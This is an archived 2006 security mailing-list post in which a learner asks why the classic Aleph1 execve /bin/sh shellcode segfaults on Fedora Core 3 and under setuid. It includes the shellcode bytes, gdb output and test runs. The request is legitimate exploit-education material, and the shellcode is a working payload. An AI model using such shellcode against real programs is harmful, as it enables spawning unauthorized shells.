From: Paul Sebastian Ziegler (psz@observed.de)
Date: Mon Jun 19 2006 - 15:06:45 EDT
Hi,
I recently ran into a problem while exploring overflowing mechanisms.
The overflowing itself is working just fine. But now I am at the point
where I want to actually inject code into my test applications so I
started searching for shellcodes to play with.
Now when I use codes for playing around (e.g. opening the cd-drive)
everything works just fine. However as soon as anything actually invokes
a shell thus becoming a real "shellcode" the shellcode itself segfaults.
As an example I have used this code contained in the paper "Buffer
Overflows Complete" from http://hackaholic.org :
-------------------------------------------------------------------------------
char main[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
-------------------------------------------------------------------------------
It is the same code that is also used in Aleph1's famous Phrack-Article
49-14.
Next I compile it successfully:
-------------------------------------------------------------------------------
$ gcc -o sh sh.c
-------------------------------------------------------------------------------
No errors here.
However when trying to run ./sh I get this:
-------------------------------------------------------------------------------
$ ./sh
Speicherzugriffsfehler (Segmentation fault)
-------------------------------------------------------------------------------
I thought of trying to find out what happens here so I fired up gdb to
check out:
-------------------------------------------------------------------------------
$ gdb -q sh
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) run
Starting program: /home/tatsumori/exp/sh
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
(gdb) backtrace
#0 0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
#1 0x080482ad in _start ()
(gdb) info reg
eax 0xa5e17c 10871164
ecx 0xbff2163c -1074653636
edx 0x1 1
ebx 0xa5bff4 10862580
esp 0xbff215b0 0xbff215b0
ebp 0xbff21608 0xbff21608
esi 0xbff21634 -1074653644
edi 0xbff215c0 -1074653760
eip 0x949e20 0x949e20
eflags 0x10246 66118
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
---------------------------------------------------------------------------------
Ok, so libc seems to be canceling my code here.
This was tested on a Fedora Core 3 machine
Linux version 2.6.11-1.14_FC3 (bhcompile@bugs.build.redhat.com) (gcc
version 3.4.3 20050227 (Red Hat 3.4.3-22)) #1 Thu Apr 7 19:23:49 EDT
2005
I also tested it on my gentoo-box with ssp and pie.
Here it is impossible to actually smash the stack, however the shellcode
itself works.
---------------------------------------------------------------------------------
% gcc -o sh sh.c
% ./sh
sh-3.1$ exit
---------------------------------------------------------------------------------
Linux version 2.6.16-hardened-r6r4h (root@localhost) (gcc ãƒãƒ¼ã‚¸ãƒ§ãƒ³
3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)) #10 PREEMPT Wed Jun
14 23:09:30 CEST 2006
However this is only true as long as I don't use setuid-code. Once I do
this I get exactly the same segfault on this box too.
I got the feeling that this is some kine of (maybe to) well know
standard problem so I tried google. However the only keywords I could
come up with (e.g. "shellcode setuid segfault") are conained in every
single overflowing paper so I got 100,000+ results with the first 300
being tutorials that didn't contain anything useful for me.
I would greatly appreciate it if someone could tell me what is going on
here. Or maybe give me the name/URL of some paper handling this or
giving me the right keyword to search for myself.
Thanks a lot in advance!
MfG
Paul
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:08 EDT